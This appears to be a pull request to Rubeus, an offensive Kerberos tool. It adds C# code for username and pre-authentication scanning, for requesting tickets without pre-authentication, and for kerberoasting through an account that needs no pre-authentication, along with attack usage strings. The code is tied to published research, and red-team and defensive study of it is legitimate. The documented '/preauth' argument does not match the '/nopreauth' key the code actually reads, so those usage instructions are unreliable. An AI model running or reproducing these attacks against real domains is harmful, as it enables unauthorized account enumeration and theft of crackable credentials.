### PR TITLE
added preauthscan command, various arguments to asktgt/kerberoast wit…

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,15 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [2.2.0]
+
+### Added
+
+* `preauthscan` command to scan for accounts that do not require Kerberos pre-authentication
+* `/preauth` argument to the `kerberoast` command, to kerberoast with an account that does not require Kerberos pre-authentication
+* `/nopreauth` flag to the `asktgt` command, to request a TGT without providing pre-authentication
+* `/service` argument to the `asktgt` command, to request service tickets using an AS-REQ
+
 ## [2.1.0]
 
 ### Added

--- a/Rubeus/Commands/Kerberoast.cs
+++ b/Rubeus/Commands/Kerberoast.cs
@@ -36,6 +36,7 @@ namespace Rubeus.Commands
             bool autoenterprise = false;
             bool ldaps = false;
             System.Net.NetworkCredential cred = null;
+            string nopreauth = null;
 
             if (arguments.ContainsKey("/spn"))
             {
@@ -235,7 +236,19 @@ namespace Rubeus.Commands
                 cred = new System.Net.NetworkCredential(userName, password, domainName);
             }
 
-            Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, delay, jitter, listUsers, enterprise, autoenterprise, ldaps);
+            // roast with a user configured to not require pre-auth
+            if (arguments.ContainsKey("/nopreauth"))
+            {
+                nopreauth = arguments["/nopreauth"];
+            }
+
+            if (!String.IsNullOrWhiteSpace(nopreauth) && (String.IsNullOrWhiteSpace(spn) && (spns == null || spns.Count < 1)))
+            {
+                Console.WriteLine("\r\n[X] /spn or /spns is required when specifying /nopreauth\r\n");
+                return;
+            }
+
+            Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, delay, jitter, listUsers, enterprise, autoenterprise, ldaps, nopreauth);
         }
     }
 }

--- a/Rubeus/Commands/Preauthscan.cs
+++ b/Rubeus/Commands/Preauthscan.cs
@@ -1,0 +1,71 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Rubeus.Commands
+{
+    public class Preauthscan : ICommand
+    {
+        public static string CommandName => "preauthscan";
+
+        public void Execute(Dictionary<string, string> arguments)
+        {
+            Console.WriteLine("[*] Action: Scan for accounts not requiring Kerberos Pre-Authentication\r\n");
+
+            List<string> users = new List<string>();
+            string domain = null;
+            string dc = null;
+            string proxyUrl = null;
+
+            if (arguments.ContainsKey("/users"))
+            {
+                if (System.IO.File.Exists(arguments["/users"]))
+                {
+                    string fileContent = Encoding.UTF8.GetString(System.IO.File.ReadAllBytes(arguments["/users"]));
+                    foreach (string u in fileContent.Split('\n'))
+                    {
+                        if (!String.IsNullOrWhiteSpace(u))
+                        {
+                            users.Add(u.Trim());
+                        }
+                    }
+                }
+                else
+                {
+                    foreach (string u in arguments["/users"].Split(','))
+                    {
+                        users.Add(u);
+                    }
+                }
+            }
+
+            if (users.Count < 1)
+            {
+                Console.WriteLine("[X] No usernames to try, exiting.");
+                return;
+            }
+
+            if (arguments.ContainsKey("/domain"))
+            {
+                domain = arguments["/domain"];
+            }
+            if (arguments.ContainsKey("/dc"))
+            {
+                dc = arguments["/dc"];
+            }
+
+            if (String.IsNullOrEmpty(domain))
+            {
+                domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().Name;
+            }
+
+            if (arguments.ContainsKey("/proxyurl"))
+            {
+                proxyUrl = arguments["/proxyurl"];
+            }
+
+            Ask.PreAuthScan(users, domain, dc, proxyUrl);
+        }
+    }
+}

--- a/Rubeus/Domain/CommandCollection.cs
+++ b/Rubeus/Domain/CommandCollection.cs
@@ -44,6 +44,7 @@ namespace Rubeus.Domain
             _availableCommands.Add(Silver.CommandName, () => new Silver());
             _availableCommands.Add(Golden.CommandName, () => new Golden());
             _availableCommands.Add(Diamond.CommandName, () => new Diamond());
+            _availableCommands.Add(Preauthscan.CommandName, () => new Preauthscan());
         }
 
         public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -12,7 +12,7 @@ namespace Rubeus.Domain
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v2.1.2 \r\n");
+            Console.WriteLine("  v2.2.0 \r\n");
         }
 
         public static void ShowUsage()
@@ -32,6 +32,12 @@ namespace Rubeus.Domain
     Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:
         Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]
 
+    Request a TGT without sending pre-auth data:
+        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy]
+
+    Request a service ticket using an AS-REQ:
+        Rubeus.exe asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy]
+
     Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:
         Rubeus.exe asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]
 
@@ -40,6 +46,9 @@ namespace Rubeus.Domain
 
     Perform a Kerberos-based password bruteforcing attack:
         Rubeus.exe brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]
+
+    Perform a scan for account that do not require pre-authentication:
+        Rubeus.exe preauthscan /users:C:\temp\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:https://KDC_PROXY/kdcproxy]
 
 
  Constrained delegation abuse:
@@ -167,6 +176,9 @@ namespace Rubeus.Domain
 
     Perform AES Kerberoasting:
         Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]
+
+    Perform Kerberoasting using an account without pre-auth by sending AS-REQ's:
+        Rubeus.exe kerberoast </spn:""blah/blah"" | /spns:C:\temp\spns.txt> /preauth:USER /domain:DOMAIN [/dc:DOMAIN_CONTROLLER] [/nowrap]
 
     Perform AS-REP ""roasting"" for any users without preauth:
         Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] [/ldaps] [/nowrap]

--- a/Rubeus/Rubeus.csproj
+++ b/Rubeus/Rubeus.csproj
@@ -91,6 +91,7 @@
     <Compile Include="Commands\Kerberoast.cs" />
     <Compile Include="Commands\Klist.cs" />
     <Compile Include="Commands\Monitor.cs" />
+    <Compile Include="Commands\Preauthscan.cs" />
     <Compile Include="Commands\Ptt.cs" />
     <Compile Include="Commands\Purge.cs" />
     <Compile Include="Commands\RenewCommand.cs" />

--- a/Rubeus/lib/krb_structures/AS_REQ.cs
+++ b/Rubeus/lib/krb_structures/AS_REQ.cs
@@ -20,7 +20,7 @@ namespace Rubeus
     
     public class AS_REQ
     {
-        public static AS_REQ NewASReq(string userName, string domain, Interop.KERB_ETYPE etype, bool opsec = false)
+        public static AS_REQ NewASReq(string userName, string domain, Interop.KERB_ETYPE etype, bool opsec = false, string service = null)
         {
             // build a new AS-REQ for the given userName, domain, and etype, but no PA-ENC-TIMESTAMP
             //  used for AS-REP-roasting
@@ -36,8 +36,31 @@ namespace Rubeus
             // KRB_NT_SRV_INST = 2
             //      service and other unique instance (krbtgt)
             req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
-            req.req_body.sname.name_string.Add("krbtgt");
-            req.req_body.sname.name_string.Add(domain);
+
+            if (!String.IsNullOrWhiteSpace(service))
+            {
+                var parts = service.Split('/');
+                if (parts.Length < 2)
+                {
+                    if (service.Contains("@"))
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_ENTERPRISE;
+                    }
+                    else
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_PRINCIPAL;
+                    }
+                }
+                foreach (var part in parts)
+                {
+                    req.req_body.sname.name_string.Add(part);
+                }
+            }
+            else
+            {
+                req.req_body.sname.name_string.Add("krbtgt");
+                req.req_body.sname.name_string.Add(domain);
+            }
 
             // try to build a realistic request
             if (opsec)
@@ -64,7 +87,7 @@ namespace Rubeus
             return req;
         }
 
-        public static AS_REQ NewASReq(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool opsec = false, bool changepw = false, bool pac = true)
+        public static AS_REQ NewASReq(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool opsec = false, bool changepw = false, bool pac = true, string service = null)
         {
             // build a new AS-REQ for the given userName, domain, and etype, w/ PA-ENC-TIMESTAMP
             //  used for "legit" AS-REQs w/ pre-auth
@@ -84,7 +107,26 @@ namespace Rubeus
             //      service and other unique instance (krbtgt)
             req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
 
-            if (!changepw) {
+            if (!String.IsNullOrWhiteSpace(service))
+            {
+                var parts = service.Split('/');
+                if (parts.Length < 2)
+                {
+                    if (service.Contains("@"))
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_ENTERPRISE;
+                    }
+                    else
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_PRINCIPAL;
+                    }
+                }
+                foreach (var part in parts)
+                {
+                    req.req_body.sname.name_string.Add(part);
+                }
+            }
+            else if (!changepw) {
                 req.req_body.sname.name_string.Add("krbtgt");
                 req.req_body.sname.name_string.Add(domain);
             } else {
@@ -117,7 +159,7 @@ namespace Rubeus
         }
 
         //TODO: Insert DHKeyPair parameter also.
-        public static AS_REQ NewASReq(string userName, string domain, X509Certificate2 cert, KDCKeyAgreement agreement, Interop.KERB_ETYPE etype, bool verifyCerts = false) {
+        public static AS_REQ NewASReq(string userName, string domain, X509Certificate2 cert, KDCKeyAgreement agreement, Interop.KERB_ETYPE etype, bool verifyCerts = false, string service = null) {
 
             // build a new AS-REQ for the given userName, domain, and etype, w/ PA-ENC-TIMESTAMP
             //  used for "legit" AS-REQs w/ pre-auth
@@ -136,8 +178,31 @@ namespace Rubeus
             // KRB_NT_SRV_INST = 2
             //      service and other unique instance (krbtgt)
             req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
-            req.req_body.sname.name_string.Add("krbtgt");
-            req.req_body.sname.name_string.Add(domain);
+
+            if (!String.IsNullOrWhiteSpace(service))
+            {
+                var parts = service.Split('/');
+                if (parts.Length < 2)
+                {
+                    if (service.Contains("@"))
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_ENTERPRISE;
+                    }
+                    else
+                    {
+                        req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_PRINCIPAL;
+                    }
+                }
+                foreach (var part in parts)
+                {
+                    req.req_body.sname.name_string.Add(part);
+                }
+            }
+            else
+            {
+                req.req_body.sname.name_string.Add("krbtgt");
+                req.req_body.sname.name_string.Add(domain);
+            }
 
             // add in our encryption type
             req.req_body.etypes.Add(etype);


### PR DESCRIPTION
…hout preauth from the AS

The changes in this PR is related to the research described in [this post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts) (which should be published shortly following this PR), so check that out for more details.

Added 2 arguments to `asktgt` for playing with requesting service tickets from the AS and requesting tickets without preauth, `/service:X` which can contain a username or SPN to request a service ticket using an AS-REQ and `/nopreauth` to request a ticket from the AS without providing preauth.

Added an argument to `kerberoast`, `/preauth:X` which will take the username of an account that doesn't require preauth and request ST's for all SPNs/usernames passed with the `/spn:Y` or `/spns:Z` arguments, either of these arguments are required when using `/preauth:USER`. If using this argument, a TGT or credentials are **not** required.

Also added a command `preauthscan` which will take a list of usernames and send AS-REQ's without preauth to determine if a username is valid and if it requires preauth. This command also supports `/proxyurl:X` for sending the AS-REQ's through a KDC proxy.